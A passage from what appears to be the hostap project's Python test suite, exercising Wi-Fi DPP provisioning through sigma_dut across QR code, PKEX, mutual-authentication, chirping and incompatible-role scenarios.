check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_enrollee_configurator(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee (to become Configurator)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=configurator ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPNetworkRole,Configurator,DPPBS,QR,DPPTimeout,6", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee"""
run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev)
def test_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee (extra check)"""
run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev,
extra="DPPAuthDirection,Mutual,")
def test_sigma_dut_dpp_qr_mutual_init_enrollee_mud_url(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee (MUD URL)"""
run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev,
mud_url="https://example.com/mud")
def run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev, extra='',
mud_url=None):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
cmd = "DPP_LISTEN 2437 role=configurator qr=mutual"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,%sDPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes" % extra
if mud_url:
cmd += ",MUDURL," + mud_url
res = sigma_dut_cmd_check(cmd, timeout=10)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
if mud_url:
ev = dev[1].wait_event(["DPP-MUD-URL"], timeout=1)
if ev is None:
raise Exception("DPP MUD URL not reported")
if ev.split(' ')[1] != mud_url:
raise Exception("Unexpected MUD URL value: " + ev)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def dpp_init_conf_mutual(dev, id1, conf_id, own_id=None):
time.sleep(1)
logger.info("Starting DPP initiator/configurator in a thread")
cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp ssid=%s configurator=%d" % (id1, to_hex("DPPNET01"), conf_id)
if own_id is not None:
cmd += " own=%d" % own_id
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=10)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def test_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev):
"""sigma_dut DPP/QR (mutual) responder as Enrollee"""
run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev)
def test_sigma_dut_dpp_qr_mutual_resp_enrollee_pending(dev, apdev):
"""sigma_dut DPP/QR (mutual) responder as Enrollee (response pending)"""
run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev, ',DPPDelayQRResponse,1')
def run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev, extra=None):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_init_conf_mutual,
args=(dev[1], id1, conf_id, id0))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,20,DPPWaitForConnect,Yes"
if extra:
cmd += extra
res = sigma_dut_cmd(cmd, timeout=25)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def dpp_resp_conf_mutual(dev, conf_id, uri):
logger.info("Starting DPP responder/configurator in a thread")
dev.set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"),
conf_id))
cmd = "DPP_LISTEN 2437 role=configurator qr=mutual"
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP listen")
if uri:
ev = dev.wait_event(["DPP-SCAN-PEER-QR-CODE"], timeout=10)
if ev is None:
raise Exception("QR Code scan for mutual authentication not requested")
dev.dpp_qr_code(uri)
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=10)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP responder/configurator done")
def test_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee"""
run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, False)
def test_sigma_dut_dpp_qr_mutual_init_enrollee_pending(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee (response pending)"""
run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, True)
def run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, resp_pending):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
if not resp_pending:
dev[1].dpp_qr_code(uri)
uri = None
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_resp_conf_mutual,
args=(dev[1], conf_id, uri))
t.start()
time.sleep(1)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,10,DPPWaitForConnect,Yes"
res = sigma_dut_cmd(cmd, timeout=15)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_enrollee_psk(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee (PSK)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
params = hostapd.wpa2_params(ssid="DPPNET01",
passphrase="ThisIsDppPassphrase")
hapd = hostapd.add_ap(apdev[0], params)
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-psk ssid=%s pass=%s configurator=%d" % (to_hex("DPPNET01"), to_hex("ThisIsDppPassphrase"), conf_id))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_enrollee_sae(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee (SAE)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
check_sae_capab(dev[0])
params = hostapd.wpa2_params(ssid="DPPNET01",
passphrase="ThisIsDppPassphrase")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
dev[0].set("sae_groups", "")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-sae ssid=%s pass=%s configurator=%d" % (to_hex("DPPNET01"), to_hex("ThisIsDppPassphrase"), conf_id))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_configurator_1(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 1)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1)
def test_sigma_dut_dpp_qr_init_configurator_2(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 2)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 2)
def test_sigma_dut_dpp_qr_init_configurator_3(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 3)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 3)
def test_sigma_dut_dpp_qr_init_configurator_4(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 4)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 4)
def test_sigma_dut_dpp_qr_init_configurator_5(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 5)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 5)
def test_sigma_dut_dpp_qr_init_configurator_6(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 6)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 6)
def test_sigma_dut_dpp_qr_init_configurator_7(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 7)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 7)
def test_sigma_dut_dpp_qr_init_configurator_both(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator or Enrollee (conf index 1)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1, "Both")
def test_sigma_dut_dpp_qr_init_configurator_neg_freq(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (neg_freq)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1, extra='DPPSubsequentChannel,81/11')
def test_sigma_dut_dpp_qr_init_configurator_mud_url(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (MUD URL)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1,
mud_url="https://example.com/mud")
def run_sigma_dut_dpp_qr_init_configurator(dev, apdev, conf_idx,
prov_role="Configurator",
extra=None, mud_url=None):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
if mud_url:
dev[1].set("dpp_mud_url", mud_url)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,%s,DPPConfIndex,%d,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6" % (prov_role, conf_idx)
if extra:
cmd += "," + extra
res = sigma_dut_cmd(cmd)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
if mud_url and ",MUDURL," + mud_url not in res:
raise Exception("Unexpected result (missing MUD URL): " + res)
finally:
dev[1].set("dpp_mud_url", "")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_incompatible_roles_init(dev, apdev):
"""sigma_dut DPP roles incompatible (Initiator)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6"
res = sigma_dut_cmd(cmd)
if "BootstrapResult,OK,AuthResult,ROLES_NOT_COMPATIBLE" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def dpp_init_enrollee_mutual(dev, id1, own_id):
logger.info("Starting DPP initiator/enrollee in a thread")
time.sleep(1)
cmd = "DPP_AUTH_INIT peer=%d own=%d role=enrollee" % (id1, own_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-RECEIVED",
"DPP-NOT-COMPATIBLE"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP initiator/enrollee done")
def test_sigma_dut_dpp_incompatible_roles_resp(dev, apdev):
"""sigma_dut DPP roles incompatible (Responder)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_init_enrollee_mutual, args=(dev[1], id1, id0))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6"
res = sigma_dut_cmd(cmd, timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,ROLES_NOT_COMPATIBLE" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_enrollee_chirp(dev, apdev):
"""sigma_dut DPP/QR as chirping Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd_check(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
conf_id = dev[1].dpp_configurator_add(key=csign)
idc = dev[1].dpp_qr_code(uri)
dev[1].dpp_bootstrap_set(idc, conf="sta-dpp", configurator=conf_id,
ssid="DPPNET01")
dev[1].dpp_listen(2437)
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,16,DPPWaitForConnect,Yes,DPPChirp,Enable", timeout=20)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def dpp_enrollee_chirp(dev, id1):
logger.info("Starting chirping Enrollee in a thread")
time.sleep(0.1)
cmd = "DPP_CHIRP own=%d" % id1
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP chirping")
ev = dev.wait_event(["DPP-CONF-RECEIVED"], timeout=15)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP enrollee done")
def test_sigma_dut_dpp_qr_configurator_chirp(dev, apdev):
"""sigma_dut DPP/QR as Configurator waiting for chirp"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
id1 = dev[1].dpp_bootstrap_gen(chan="81/1")
uri = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id1)
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_enrollee_chirp, args=(dev[1], id1))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,16,DPPChirp,Enable,DPPChirpChannel,6", timeout=20)
t.join()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_ap_dpp_qr_enrollee_chirp(dev, apdev, params):
"""sigma_dut DPP/QR AP as chirping Enrollee"""
check_dpp_capab(dev[0], min_ver=2)
check_dpp_capab(dev[1])
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,program,DPP")
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd_check(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
conf_id = dev[0].dpp_configurator_add(key=csign)
idc = dev[0].dpp_qr_code(uri)
dev[0].dpp_bootstrap_set(idc, conf="ap-dpp", configurator=conf_id,
ssid="DPPNET01")
dev[0].dpp_listen(2437)
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,16,DPPChirp,Enable", timeout=20)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[1].set("dpp_config_processing", "2")
id = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id)
dev[1].dpp_listen(2437)
dev[0].dpp_auth_init(uri=uri, conf="sta-dpp", ssid="DPPNET01",
configurator=conf_id)
dev[1].wait_connected(timeout=20)
sigma_dut_cmd_check("ap_reset_default,program,DPP")
finally:
dev[1].set("dpp_config_processing", "0", allow_fail=True)
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_pkex_init_configurator(dev, apdev):
"""sigma_dut DPP/PKEX initiator as Configurator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
id1 = dev[1].dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d identifier=test code=secret" % (id1)
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,6")
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_pkex_init_configurator_tcp(dev, apdev):
"""sigma_dut DPP/PKEX initiator as Configurator (TCP)"""
check_dpp_capab(dev[0], min_ver=3)
check_dpp_capab(dev[1], min_ver=3)
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "DPP_CONTROLLER_START"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to start Controller")
id1 = dev[1].dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d identifier=test code=secret" % (id1)
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,6,DPPOverTCP,127.0.0.1")
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def dpp_pkex_resp_start_on_v1(dev):
while True:
ev = dev.wait_event(["DPP-RX"], timeout=5)
if ev is None:
return
if "type=7" in ev:
logger.info("Starting PKEXv1 responder in a thread")
